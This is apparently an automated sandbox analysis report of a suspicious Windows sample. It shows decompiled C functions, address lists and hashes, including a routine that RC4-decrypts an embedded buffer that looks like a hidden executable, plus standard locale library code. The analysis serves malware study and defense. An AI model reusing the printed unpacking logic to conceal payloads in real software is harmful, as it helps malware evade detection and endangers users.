                                                0x001c0c7a
                                                0x00000000
                                                0x001c0c21
                                                0x001c0c2a
                                                0x001c0c50
                                                0x001c0c50
                                                0x001c0c57
                                                0x001c0c57
                                                0x001c0c62
                                                0x00000000
                                                0x001c0c64
                                                0x001c0c64
                                                0x001c0c66
                                                0x001c0c69
                                                0x001c0c69
                                                0x001c0c6c
                                                0x001c0c6f
                                                0x00000000
                                                0x001c0c78
                                                0x001c0c2c
                                                0x001c0c2c
                                                0x001c0c2f
                                                0x001c0c31
                                                0x001c0c34
                                                0x001c0c34
                                                0x001c0c37
                                                0x001c0c3a
                                                0x001c0c4e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c0c4e
                                                0x001c0c2a
                                                0x001c0c1f
                                                0x001c0bcd
                                                0x001c0bd3
                                                0x001c0bd3
                                                0x001c0bd9
                                                0x001c0bdf
                                                0x00000000
                                                0x001c0be5
                                                0x001c0be5
                                                0x001c0be7
                                                0x001c0bea
                                                0x001c0bea
                                                0x001c0bed
                                                0x001c0bf0
                                                0x001c0ca4
                                                0x001c0ca6
                                                0x001c0cab
                                                0x001c0cb0
                                                0x001c0cb5
                                                0x001c0cba
                                                0x001c0cd8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c0cba
                                                0x001c0bdf
                                                0x001c0bcb
                                                0x001c0b6e
                                                0x001c0b6e
                                                0x00000000
                                                0x001c0b6e
                                                0x001c0b6c
                                                0x001c0a78
                                                0x001c0a86
                                                0x001c0a9b
                                                0x001c0aaf
                                                0x001c0ab6
                                                0x001c0abb
                                                0x001c0adb
                                                0x00000000
                                                0x001c0add
                                                0x001c0ae0
                                                0x001c0b79
                                                0x001c0b7d
                                                0x00000000
                                                0x001c0b8a
                                                0x001c0b8a
                                                0x001c0b8e
                                                0x001c0b90
                                                0x001c0b93
                                                0x001c0b93
                                                0x001c0b96
                                                0x001c0b99
                                                0x00000000
                                                0x001c0b9e
                                                0x001c0ae6
                                                0x001c0af3
                                                0x001c0af8
                                                0x001c0afd
                                                0x00000000
                                                0x001c0aff
                                                0x001c0aff
                                                0x001c0b03
                                                0x001c0b05
                                                0x001c0b08
                                                0x001c0b08
                                                0x001c0b0b
                                                0x001c0b0e
                                                0x00000000
                                                0x001c0b08
                                                0x001c0afd
                                                0x001c0ae0
                                                0x001c0abd
                                                0x001c0ac3
                                                0x001c0ac6
                                                0x001c0ac8
                                                0x001c0acb
                                                0x001c0acb
                                                0x001c0ace
                                                0x001c0ad1
                                                0x001c0b13
                                                0x001c0b15
                                                0x001c0b1a
                                                0x001c0b1c
                                                0x001c0b25
                                                0x001c0b2a
                                                0x001c0b2f
                                                0x001c0cda
                                                0x001c0cda
                                                0x001c0cdb
                                                0x001c0cdc
                                                0x001c0cdd
                                                0x001c0cde
                                                0x001c0cdf
                                                0x001c0ce4
                                                0x001c0ce7
                                                0x001c0ce8
                                                0x001c0cf0
                                                0x001c0cf7
                                                0x001c0cfa
                                                0x001c0cfb
                                                0x001c0cfc
                                                0x001c0d04
                                                0x001c0d14
                                                0x001c0d24
                                                0x001c0d2b
                                                0x001c0d46
                                                0x001c0d7e
                                                0x001c0d86
                                                0x00000000
                                                0x001c0d48
                                                0x001c0d48
                                                0x001c0d4a
                                                0x001c0d4d
                                                0x001c0d50
                                                0x001c0d50
                                                0x001c0d53
                                                0x001c0d56
                                                0x001c0d5d
                                                0x001c0d62
                                                0x001c0d64
                                                0x001c0d77
                                                0x001c0d99
                                                0x001c0d9a
                                                0x001c0d9b
                                                0x001c0d9c
                                                0x001c0d9d
                                                0x001c0d9e
                                                0x001c0da3
                                                0x001c0da6
                                                0x001c0da9
                                                0x001c0daa
                                                0x001c0dab
                                                0x001c0dae
                                                0x001c0db1
                                                0x001c0e89
                                                0x001c0e89
                                                0x001c0e8e
                                                0x001c0e8f
                                                0x001c0db7
                                                0x001c0db7
                                                0x001c0dbc
                                                0x00000000
                                                0x001c0dc2
                                                0x001c0dc2
                                                0x001c0dc7
                                                0x001c0dc9
                                                0x001c0dc9
                                                0x001c0dcf
                                                0x00000000
                                                0x00000000
                                                0x001c0dd4
                                                0x001c0deb
                                                0x001c0deb
                                                0x001c0dd6
                                                0x001c0dd6
                                                0x001c0dde
                                                0x00000000
                                                0x001c0de0
                                                0x001c0de0
                                                0x001c0de3
                                                0x001c0de9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c0de9
                                                0x001c0dde
                                                0x001c0df4
                                                0x001c0df6
                                                0x00000000
                                                0x001c0dfc
                                                0x001c0e0b
                                                0x001c0e77
                                                0x00000000
                                                0x001c0e77
                                                0x001c0e1e
                                                0x001c0e23
                                                0x001c0e25
                                                0x001c0e25
                                                0x001c0e2b
                                                0x00000000
                                                0x00000000
                                                0x001c0e30
                                                0x001c0e32
                                                0x001c0e3a
                                                0x00000000
                                                0x001c0e3c
                                                0x001c0e3c
                                                0x001c0e3f
                                                0x001c0e45
                                                0x00000000
                                                0x00000000
                                                0x001c0e47
                                                0x001c0e45
                                                0x001c0e3a
                                                0x001c0e4e
                                                0x001c0e50
                                                0x00000000
                                                0x001c0e86
                                                0x001c0e52
                                                0x001c0e57
                                                0x001c0e58
                                                0x00000000
                                                0x001c0e58
                                                0x001c0e49
                                                0x001c0e4b
                                                0x00000000
                                                0x001c0e4b
                                                0x00000000
                                                0x001c0df6
                                                0x001c0def
                                                0x001c0df1
                                                0x00000000
                                                0x001c0df1
                                                0x001c0dbc
                                                0x001c0e5d
                                                0x001c0e65
                                                0x001c0e6d
                                                0x00000000
                                                0x001c0e96
                                                0x001c0e6f
                                                0x001c0e75
                                                0x00000000
                                                0x00000000
                                                0x001c0e7f
                                                0x001c0d79
                                                0x001c0d79
                                                0x001c0d7d
                                                0x00000000
                                                0x001c0d7d
                                                0x001c0d77
                                                0x001c0d2d
                                                0x001c0d2d
                                                0x001c0d30
                                                0x001c0d89
                                                0x001c0d96
                                                0x001c0d96
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c0b2f
                                                0x001c0a9d
                                                0x001c0a9d
                                                0x001c0b71
                                                0x001c0b73
                                                0x001c0cc7
                                                0x001c0cc7
                                                0x00000000
                                                0x001c0cc7
                                                0x001c0a9b
                                                0x001c0a4d
                                                0x001c0a4d
                                                0x001c0a50
                                                0x001c0cc8
                                                0x001c0cd5
                                                0x001c0cd5

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                • String ID:
                                                • API String ID: 3471368781-0
                                                • Opcode ID: 9a2480fdeee1dea036d187910118839f3b7393ef7847c4cb60221c608e5c45f7
                                                • Instruction ID: 470fd7fcb20c70a78efef1e63f29f54d7d80f0a5773d9f6710f51c6db54fd224
                                                • Opcode Fuzzy Hash: 9a2480fdeee1dea036d187910118839f3b7393ef7847c4cb60221c608e5c45f7
                                                • Instruction Fuzzy Hash: 6FB1E379500706CBDB39DB28CC92FB7B3A8EF68708F14456DE98686580EB75ED81CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E001A2200() {
                                                				intOrPtr _v8;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				signed int _v24;
                                                				signed int _v300;
                                                				signed int _v304;
                                                				intOrPtr _v308;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t53;
                                                				signed int _t54;
                                                				signed int _t56;
                                                				signed int _t61;
                                                				intOrPtr _t64;
                                                				signed int _t67;
                                                				signed int _t68;
                                                				signed int _t69;
                                                				void* _t70;
                                                				signed int _t74;
                                                				signed int _t90;
                                                				signed char _t92;
                                                				signed int _t94;
                                                				signed int _t95;
                                                				signed int _t96;
                                                				void* _t97;
                                                				signed int _t102;
                                                				signed int _t104;
                                                				void* _t107;
                                                				signed int _t108;
                                                				signed int _t111;
                                                				void* _t112;
                                                
                                                				_push(0xffffffff);
                                                				_push(0x1c6770);
                                                				_push( *[fs:0x0]);
                                                				_t53 =  *0x1d5010; // 0x8121a627
                                                				_t54 = _t53 ^ _t111;
                                                				_v24 = _t54;
                                                				_push(_t54);
                                                				 *[fs:0x0] =  &_v16;
                                                				_v20 = _t112 - 0x224;
                                                				_v300 = 0;
                                                				_t56 = 0;
                                                				_t90 = 0;
                                                				_t74 = 0;
                                                				_t102 = 0;
                                                				_t94 = 0;
                                                				_t67 = 0;
                                                				asm("o16 nop [eax+eax]");
                                                				do {
                                                					 *(_t111 + _t90 - 0x118) = _t56;
                                                					_t11 = _t102 - ((_t74 - (0xa41a41a5 * _t74 >> 0x20) >> 1) + (0xa41a41a5 * _t74 >> 0x20) >> 5) * 0x27 + 0x1d26b0; // 0x3eaf2d66
                                                					 *((char*)(_t111 + _t94 - 0x230)) =  *_t11;
                                                					_t14 = _t67 + 1; // 0x1
                                                					_t56 = _t14;
                                                					_t90 = _t56;
                                                					_t74 = _t56;
                                                					_t102 = _t56;
                                                					_t94 = _t56;
                                                					_t67 = _t56;
                                                				} while (_t56 < 0x100);
                                                				_v300 = _t56;
                                                				_v300 = 0;
                                                				_t104 = 0;
                                                				_t61 = 0;
                                                				_t95 = 0;
                                                				_t68 = 0;
                                                				asm("o16 nop [eax+eax]");
                                                				do {
                                                					_t92 =  *((intOrPtr*)(_t111 + _t95 - 0x118));
                                                					_t104 = _t104 + ( *(_t111 + _t61 - 0x230) & 0x000000ff) + (_t92 & 0x000000ff) & 0x800000ff;
                                                					if(_t104 < 0) {
                                                						_t104 = (_t104 - 0x00000001 | 0xffffff00) + 1;
                                                					}
                                                					 *((char*)(_t111 + _t95 - 0x118)) =  *(_t111 + _t104 - 0x118);
                                                					 *(_t111 + _t104 - 0x118) = _t92;
                                                					_t27 = _t68 + 1; // 0x1
                                                					_t61 = _t27;
                                                					_t95 = _t61;
                                                					_t68 = _t61;
                                                				} while (_t61 < 0x100);
                                                				_v300 = _t61;
                                                				_t96 = 0;
                                                				_v300 = 0;
                                                				_t69 = 0;
                                                				_v304 = 0;
                                                				_t64 = 0;
                                                				while(1) {
                                                					_v308 = _t64;
                                                					if(_t64 >= 0x2c600) {
                                                						break;
                                                					}
                                                					_v8 = 0;
                                                					_t96 = _t96 + 0x00000001 & 0x800000ff;
                                                					if(_t96 < 0) {
                                                						_t96 = (_t96 - 0x00000001 | 0xffffff00) + 1;
                                                					}
                                                					_v300 = _t96;
                                                					_t92 =  *(_t111 + _t96 - 0x118);
                                                					_t108 = _t92 & 0x000000ff;
                                                					_t69 = _t69 + _t108 & 0x800000ff;
                                                					if(_t69 < 0) {
                                                						_t69 = (_t69 - 0x00000001 | 0xffffff00) + 1;
                                                					}
                                                					_v304 = _t69;
                                                					 *(_t111 + _t96 - 0x118) =  *(_t111 + _t69 - 0x118) & 0x000000ff;
                                                					 *(_t111 + _t69 - 0x118) = _t92;
                                                					_t47 = _t64 + 0x1d5a60; // 0x905a4d
                                                					 *(_t64 + 0x1d5a60) =  *(_t111 + (( *(_t111 + _t96 - 0x118) & 0x000000ff) + _t108 & 0x000000ff) - 0x118) & 0x000000ff ^  *_t47;
                                                					_v8 = 0xffffffff;
                                                					_t64 = _t64 + 1;
                                                				}
                                                				 *[fs:0x0] = _v16;
                                                				_pop(_t97);
                                                				_pop(_t107);
                                                				_pop(_t70);
                                                				return E001A9545(_t64, _t70, _v24 ^ _t111, _t92, _t97, _t107);
                                                			}



































                                                0x001a2203
                                                0x001a2205
                                                0x001a2210
                                                0x001a2217
                                                0x001a221c
                                                0x001a221e
                                                0x001a2224
                                                0x001a2228
                                                0x001a222e
                                                0x001a2231
                                                0x001a223b
                                                0x001a223d
                                                0x001a223f
                                                0x001a2241
                                                0x001a2243
                                                0x001a2245
                                                0x001a2247
                                                0x001a2250
                                                0x001a2250
                                                0x001a226c
                                                0x001a2272
                                                0x001a2279
                                                0x001a2279
                                                0x001a227c
                                                0x001a227e
                                                0x001a2280
                                                0x001a2282
                                                0x001a2284
                                                0x001a2286
                                                0x001a228d
                                                0x001a2293
                                                0x001a229d
                                                0x001a229f
                                                0x001a22a1
                                                0x001a22a3
                                                0x001a22a5
                                                0x001a22b0
                                                0x001a22b0
                                                0x001a22c6
                                                0x001a22cc
                                                0x001a22d5
                                                0x001a22d5
                                                0x001a22dd
                                                0x001a22e4
                                                0x001a22eb
                                                0x001a22eb
                                                0x001a22ee
                                                0x001a22f0
                                                0x001a22f2
                                                0x001a22f9
                                                0x001a22ff
                                                0x001a2301
                                                0x001a2307
                                                0x001a2309
                                                0x001a230f
                                                0x001a2311
                                                0x001a2311
                                                0x001a231c
                                                0x00000000
                                                0x00000000
                                                0x001a2322
                                                0x001a232a
                                                0x001a2330
                                                0x001a2339
                                                0x001a2339
                                                0x001a233a
                                                0x001a2340
                                                0x001a2347
                                                0x001a234c
                                                0x001a2352
                                                0x001a235b
                                                0x001a235b
                                                0x001a235c
                                                0x001a236a
                                                0x001a2371
                                                0x001a238d
                                                0x001a2393
                                                0x001a2399
                                                0x001a23a0
                                                0x001a23a0
                                                0x001a2401
                                                0x001a2409
                                                0x001a240a
                                                0x001a240b
                                                0x001a2419

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82285a549bff26da23fdfbb04df9b9bc34399da66b996b24a74a6f167a2b8de6
                                                • Instruction ID: b69bdf89708d51cb09204338b7b0592d384fe3b984d2cbde2560e26b912c1466
                                                • Opcode Fuzzy Hash: 82285a549bff26da23fdfbb04df9b9bc34399da66b996b24a74a6f167a2b8de6
                                                • Instruction Fuzzy Hash: 08411975A0426C4ECB58CFB998D13E9BBE1BB59320F2546FECD99D3381D6344A418B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E001A53D0(void* __ebx, void* __edi, intOrPtr _a4) {
                                                				signed int _v4;
                                                				char _v8;
                                                				char _v12;
                                                				void* _v16;
                                                				void* _v72;
                                                				intOrPtr _v84;
                                                				signed int _v88;
                                                				signed int _v96;
                                                				signed int _v100;
                                                				signed int _v104;
                                                				signed int _v108;
                                                				signed int _v112;
                                                				signed int _v116;
                                                				signed int _v120;
                                                				signed int _v124;
                                                				signed int _v128;
                                                				signed int _v132;
                                                				void* _v136;
                                                				intOrPtr _v140;
                                                				intOrPtr _v144;
                                                				void* _v156;
                                                				void* _v160;
                                                				void* __esi;
                                                				signed int _t62;
                                                				signed int _t70;
                                                				intOrPtr _t74;
                                                				int _t79;
                                                				void* _t88;
                                                				signed int _t92;
                                                				signed int _t93;
                                                				signed int _t94;
                                                				signed int _t95;
                                                				signed int _t96;
                                                				signed int _t97;
                                                				void* _t108;
                                                				signed int _t113;
                                                				signed int _t114;
                                                				intOrPtr _t116;
                                                				signed int _t117;
                                                				void* _t118;
                                                				intOrPtr _t120;
                                                				intOrPtr _t125;
                                                				void* _t132;
                                                				intOrPtr _t133;
                                                				signed int _t135;
                                                				void* _t136;
                                                				signed int _t137;
                                                				signed int _t139;
                                                				void* _t140;
                                                				signed int _t141;
                                                				signed int _t145;
                                                				void* _t149;
                                                				signed int _t150;
                                                				void* _t152;
                                                				void* _t155;
                                                				void* _t157;
                                                				void* _t159;
                                                
                                                				_t150 = _t149 - 0x88;
                                                				_t62 =  *0x1d5010; // 0x8121a627
                                                				_v4 = _t62 ^ _t150;
                                                				_push(__ebx);
                                                				_t116 = _a4;
                                                				_push(__edi);
                                                				_v84 = _t116;
                                                				E001A612A( &_v12, 0);
                                                				_t135 =  *0x20271c; // 0x1
                                                				_t145 =  *0x203570; // 0xb12ad8
                                                				if(_t135 == 0) {
                                                					E001A612A( &_v8, _t135);
                                                					_t159 =  *0x20271c - _t135; // 0x1
                                                					if(_t159 == 0) {
                                                						_t113 =  *0x202708; // 0x4
                                                						_t114 = _t113 + 1;
                                                						 *0x202708 = _t114;
                                                						 *0x20271c = _t114;
                                                					}
                                                					E001A6182( &_v8);
                                                					_t135 =  *0x20271c; // 0x1
                                                				}
                                                				_t120 =  *((intOrPtr*)(_t116 + 4));
                                                				_t117 = _t135 * 4;
                                                				if(_t135 >=  *((intOrPtr*)(_t120 + 0xc))) {
                                                					_t139 = 0;
                                                					__eflags = 0;
                                                					goto L8;
                                                				} else {
                                                					_t139 =  *(_t117 +  *((intOrPtr*)(_t120 + 8)));
                                                					if(_t139 == 0) {
                                                						L8:
                                                						__eflags =  *((char*)(_t120 + 0x14));
                                                						if( *((char*)(_t120 + 0x14)) == 0) {
                                                							L11:
                                                							__eflags = _t139;
                                                							if(_t139 != 0) {
                                                								goto L6;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t108 = E001A6477();
                                                							__eflags = _t135 -  *((intOrPtr*)(_t108 + 0xc));
                                                							if(_t135 >=  *((intOrPtr*)(_t108 + 0xc))) {
                                                								L12:
                                                								__eflags = _t145;
                                                								if(__eflags == 0) {
                                                									_t139 = E001A9553(_t139, __eflags, 0x44);
                                                									_t152 = _t150 + 4;
                                                									_t70 =  *(_v84 + 4);
                                                									__eflags = _t70;
                                                									if(_t70 == 0) {
                                                										_t137 = 0x1d245f;
                                                									} else {
                                                										_t137 =  *(_t70 + 0x18);
                                                										__eflags = _t137;
                                                										if(_t137 == 0) {
                                                											_t137 = _t70 + 0x1c;
                                                										}
                                                									}
                                                									E001A612A( &_v132, 0);
                                                									_v132 = 0;
                                                									_v128 = 0;
                                                									_v124 = 0;
                                                									_v120 = 0;
                                                									_v116 = 0;
                                                									_v112 = 0;
                                                									_v108 = 0;
                                                									_v104 = 0;
                                                									_v100 = 0;
                                                									_v96 = 0;
                                                									 *((intOrPtr*)(_t152 + 0x3c)) = 0;
                                                									_v88 = 0;
                                                									__eflags = _t137;
                                                									if(_t137 == 0) {
                                                										E001A62F1("bad locale name");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										_t125 = _v140;
                                                										_t74 = _v144;
                                                										__eflags = _t125 - 0x1000;
                                                										if(_t125 < 0x1000) {
                                                											L36:
                                                											_v140 = _t125;
                                                											_v144 = _t74;
                                                											_push(_t145);
                                                											return L001A9F7A(_v144);
                                                										} else {
                                                											_t133 =  *((intOrPtr*)(_t74 - 4));
                                                											_t125 = _t125 + 0x23;
                                                											__eflags = _t74 - _t133 + 0xfffffffc - 0x1f;
                                                											if(_t74 - _t133 + 0xfffffffc > 0x1f) {
                                                												_push(_t139);
                                                												_t141 = _t139 ^ _t139;
                                                												E001AFD8F(_t141, _t141, _t141, _t141, _t141);
                                                												_push(_t141);
                                                												_push(_t141);
                                                												_push(_t141);
                                                												_push(_t141);
                                                												_push(_t141);
                                                												L40();
                                                												asm("int3");
                                                												_t79 = IsProcessorFeaturePresent(0x17);
                                                												__eflags = _t79;
                                                												if(_t79 != 0) {
                                                													_push(5);
                                                													asm("int 0x29");
                                                												}
                                                												_push(_t141);
                                                												E001AFC47(_t117, _t133, 0xc0000417, 2, 0xc0000417, 1);
                                                												return TerminateProcess(GetCurrentProcess(), 0xc0000417);
                                                											} else {
                                                												_t74 = _t133;
                                                												goto L36;
                                                											}
                                                										}
                                                									} else {
                                                										E001A657D( &_v132,  &_v132, _t137);
                                                										 *(_t139 + 4) = 0;
                                                										 *_t139 = 0x1c72dc;
                                                										E001A8D38(_t137, _t139, __eflags, _t152 + 0x50);
                                                										_t155 = _t152 + 0xc;
                                                										asm("movups xmm0, [eax]");
                                                										asm("movups [esi+0x8], xmm0");
                                                										_t88 = E001A8EAF(_t155 + 0x58);
                                                										asm("movups xmm0, [eax]");
                                                										asm("movups [esi+0x18], xmm0");
                                                										asm("movups xmm0, [eax+0x10]");
                                                										asm("movups [esi+0x28], xmm0");
                                                										asm("movq xmm0, [eax+0x20]");
                                                										asm("movq [esi+0x38], xmm0");
                                                										 *((intOrPtr*)(_t139 + 0x40)) =  *((intOrPtr*)(_t88 + 0x28));
                                                										E001A65C8( &_v132,  &_v132);
                                                										_t92 = _v88;
                                                										_t157 = _t155 + 8;
                                                										__eflags = _t92;
                                                										if(_t92 != 0) {
                                                											E001AFB09(_t92);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_t93 = _v96;
                                                										_v88 = 0;
                                                										__eflags = _t93;
                                                										if(_t93 != 0) {
                                                											E001AFB09(_t93);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_t94 = _v104;
                                                										_v96 = 0;
                                                										__eflags = _t94;
                                                										if(_t94 != 0) {
                                                											E001AFB09(_t94);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_t95 = _v112;
                                                										_v104 = 0;
                                                										__eflags = _t95;
                                                										if(_t95 != 0) {
                                                											E001AFB09(_t95);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_t96 = _v120;
                                                										_v112 = 0;
                                                										__eflags = _t96;
                                                										if(_t96 != 0) {
                                                											E001AFB09(_t96);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_t97 = _v128;
                                                										_v120 = 0;
                                                										__eflags = _t97;
                                                										if(_t97 != 0) {
                                                											E001AFB09(_t97);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_v128 = 0;
                                                										E001A6182( &_v132);
                                                										E001A644B(__eflags, _t139);
                                                										_t150 = _t157 + 4;
                                                										 *((intOrPtr*)( *_t139 + 4))();
                                                										 *0x203570 = _t139;
                                                										goto L6;
                                                									}
                                                								} else {
                                                									_t139 = _t145;
                                                									goto L6;
                                                								}
                                                							} else {
                                                								_t139 =  *(_t117 +  *((intOrPtr*)(_t108 + 8)));
                                                								goto L11;
                                                							}
                                                						}
                                                					} else {
                                                						L6:
                                                						E001A6182( &_v12);
                                                						_pop(_t136);
                                                						_pop(_t140);
                                                						_pop(_t118);
                                                						return E001A9545(_t139, _t118, _v4 ^ _t150, _t132, _t136, _t140);
                                                					}
                                                				}
                                                			}




























































                                                0x001a53d0
                                                0x001a53d6
                                                0x001a53dd
                                                0x001a53e4
                                                0x001a53e5
                                                0x001a53f5
                                                0x001a53f8
                                                0x001a53fc
                                                0x001a5401
                                                0x001a5407
                                                0x001a540f
                                                0x001a5419
                                                0x001a541e
                                                0x001a5424
                                                0x001a5426
                                                0x001a542b
                                                0x001a542c
                                                0x001a5431
                                                0x001a5431
                                                0x001a543d
                                                0x001a5442
                                                0x001a5442
                                                0x001a5448
                                                0x001a544b
                                                0x001a5455
                                                0x001a5488
                                                0x001a5488
                                                0x00000000
                                                0x001a5457
                                                0x001a545a
                                                0x001a545f
                                                0x001a548a
                                                0x001a548a
                                                0x001a548e
                                                0x001a54a0
                                                0x001a54a0
                                                0x001a54a2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001a5490
                                                0x001a5490
                                                0x001a5495
                                                0x001a5498
                                                0x001a54a4
                                                0x001a54a4
                                                0x001a54a6
                                                0x001a54b3
                                                0x001a54b5
                                                0x001a54bc
                                                0x001a54bf
                                                0x001a54c1
                                                0x001a54cf
                                                0x001a54c3
                                                0x001a54c3
                                                0x001a54c6
                                                0x001a54c8
                                                0x001a54ca
                                                0x001a54ca
                                                0x001a54c8
                                                0x001a54da
                                                0x001a54e1
                                                0x001a54e9
                                                0x001a54ee
                                                0x001a54f6
                                                0x001a54fb
                                                0x001a5503
                                                0x001a5508
                                                0x001a550c
                                                0x001a5511
                                                0x001a5515
                                                0x001a5519
                                                0x001a551d
                                                0x001a5521
                                                0x001a5523
                                                0x001a564d
                                                0x001a5652
                                                0x001a5653
                                                0x001a5654
                                                0x001a5655
                                                0x001a5656
                                                0x001a5657
                                                0x001a5658
                                                0x001a5659
                                                0x001a565a
                                                0x001a565b
                                                0x001a565c
                                                0x001a565d
                                                0x001a565e
                                                0x001a565f
                                                0x001a5660
                                                0x001a5664
                                                0x001a5668
                                                0x001a566e
                                                0x001a5682
                                                0x001a5682
                                                0x001a5686
                                                0x001a9583
                                                0x001a9590
                                                0x001a5670
                                                0x001a5670
                                                0x001a5673
                                                0x001a567b
                                                0x001a567e
                                                0x001afe55
                                                0x001afe56
                                                0x001afe5d
                                                0x001afe65
                                                0x001afe66
                                                0x001afe67
                                                0x001afe68
                                                0x001afe69
                                                0x001afe6a
                                                0x001afe6f
                                                0x001afe72
                                                0x001afe78
                                                0x001afe7a
                                                0x001afe7c
                                                0x001afe7f
                                                0x001afe7f
                                                0x001afe81
                                                0x001afe8c
                                                0x001afea3
                                                0x001a5680
                                                0x001a5680
                                                0x00000000
                                                0x001a5680
                                                0x001a567e
                                                0x001a5529
                                                0x001a552f
                                                0x001a5538
                                                0x001a5540
                                                0x001a5546
                                                0x001a554b
                                                0x001a554e
                                                0x001a5556
                                                0x001a555a
                                                0x001a5562
                                                0x001a5565
                                                0x001a5569
                                                0x001a556d
                                                0x001a5571
                                                0x001a5576
                                                0x001a557e
                                                0x001a5586
                                                0x001a558b
                                                0x001a558f
                                                0x001a5592
                                                0x001a5594
                                                0x001a5597
                                                0x001a559c
                                                0x001a559c
                                                0x001a559f
                                                0x001a55a3
                                                0x001a55ab
                                                0x001a55ad
                                                0x001a55b0
                                                0x001a55b5
                                                0x001a55b5
                                                0x001a55b8
                                                0x001a55bc
                                                0x001a55c4
                                                0x001a55c6
                                                0x001a55c9
                                                0x001a55ce
                                                0x001a55ce
                                                0x001a55d1
                                                0x001a55d5
                                                0x001a55dd
                                                0x001a55df
                                                0x001a55e2
                                                0x001a55e7
                                                0x001a55e7
                                                0x001a55ea
                                                0x001a55ee
                                                0x001a55f6
                                                0x001a55f8
                                                0x001a55fb
                                                0x001a5600
                                                0x001a5600
                                                0x001a5603
                                                0x001a5607
                                                0x001a560f
                                                0x001a5611
                                                0x001a5614
                                                0x001a5619
                                                0x001a5619
                                                0x001a5620
                                                0x001a5628
                                                0x001a562e
                                                0x001a5635
                                                0x001a563a
                                                0x001a563d
                                                0x00000000
                                                0x001a563d
                                                0x001a54a8
                                                0x001a54a8
                                                0x00000000
                                                0x001a54a8
                                                0x001a549a
                                                0x001a549d
                                                0x00000000
                                                0x001a549d
                                                0x001a5498
                                                0x001a5461
                                                0x001a5461
                                                0x001a5468
                                                0x001a5476
                                                0x001a5477
                                                0x001a5479
                                                0x001a5487
                                                0x001a5487
                                                0x001a545f

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A53FC
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A5419
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A543D
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A5468
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A54DA
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001A552F
                                                • __Getctype.LIBCPMT ref: 001A5546
                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 001A5586
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A5628
                                                • std::_Facet_Register.LIBCPMT ref: 001A562E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
                                                • String ID: bad locale name
                                                • API String ID: 103145292-1405518554
                                                • Opcode ID: 7b08b8cd59c9eb176600aea7abc9291b8880ba68fd977c6613b6cb0ab837e0d6
                                                • Instruction ID: 736cbb80d24ab002eeadcdfcfe3db5f66c0f716cf01d6c4cf4b376d256b714c9
                                                • Opcode Fuzzy Hash: 7b08b8cd59c9eb176600aea7abc9291b8880ba68fd977c6613b6cb0ab837e0d6
